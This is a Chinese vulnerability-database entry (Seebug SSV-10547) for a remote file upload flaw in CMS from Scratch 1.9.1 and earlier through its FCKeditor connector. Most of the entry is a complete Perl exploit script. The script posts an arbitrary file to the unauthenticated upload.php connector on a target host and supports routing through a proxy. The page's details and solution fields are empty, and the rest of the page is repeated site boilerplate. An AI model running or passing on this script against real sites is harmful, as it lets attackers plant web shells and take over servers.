CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit

基本字段

漏洞编号：: SSV-10547

披露/发现时间：: 未知

提交时间：: 2009-02-04

漏洞等级：

漏洞类别：: 文件上传

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.25KB

#!/usr/bin/perl # ---------------------------------------------------------------- # CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit # by yeat - staker[at]hotmail[dot]it # http://scratchwebdesignforums.com/forums/index.php?showtopic=629 # ---------------------------------------------------------------- # (fckeditor/editor/filemanager/connectors/php/config.php) # 25. global $Config ; # 26. # 27. $Config['Enabled'] = (isset($_SESSION['loginStatus']) || # $_SESSION == NULL) ? true : false ; # ... # 39. $Config['UserFilesAbsolutePath'] = # realpath($_SERVER['DOCUMENT_ROOT']); # ---------------------------------------------------------------- use Getopt::Std; use LWP::UserAgent; getopts('p:',\my %opts); my $http = new LWP::UserAgent; my ($host,$file) = @ARGV; Main::RunExploit(); # Main Package package Main; sub Usage { return print <<EOF; +------------------------------------------------------------------+ | CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit | +------------------------------------------------------------------+ by yeat - staker[at]hotmail[dot]it Usage: perl xpl.pl host/path file [OPTIONS] host: target host and cms path file: file to upload Options: -p [specify a proxy] [server]:[port] Example: perl xpl.pl localhost/cms yeat.jpg perl xpl.pl localhost/cms yeat.jpg -p 213.151.89.109:80 EOF } sub RunExploit { if (defined $opts{p}) { HTTP::Proxy($opts{p}); } if (@ARGV < 2 || @ARGV > 4) { Main::Usage(); } else { FileUpload::Exploit($file); } } # File Upload Package package FileUpload; sub Exploit { my $file = shift; my $path = "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File"; my $data = { NewFile => [$file,$file] }; my $send = $http->post('http://'.$host.$path, $data, Content_Type => 'multipart/form-data', ); if ($send->is_success) { print $send->content; exit; } else { print "Exploit Failed!\n"; exit; } } # HTTP Package package HTTP; sub Cookies { return $http->default_header('Cookie' => $_[0]); } sub UserAgent { return $http->agent($_[0]); } sub GET { if ($_[0] !~ m{^http://(.+?)$}i) { return $http->get('http://'.$_[0]); } else { return $http->get($_[0]); } } sub http_header { return $http->default_header($_[0]); } sub Proxy { return $http->proxy('http', 'http://'.$_[0]); }

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

发现/披露了漏洞
2009-02-04 提交了漏洞
2009-02-04 提交更新了 PoC

CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

CMS from Scratch &lt;= 1.9.1 (fckeditor) Remote File Upload Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit

评论前需绑定手机现在绑定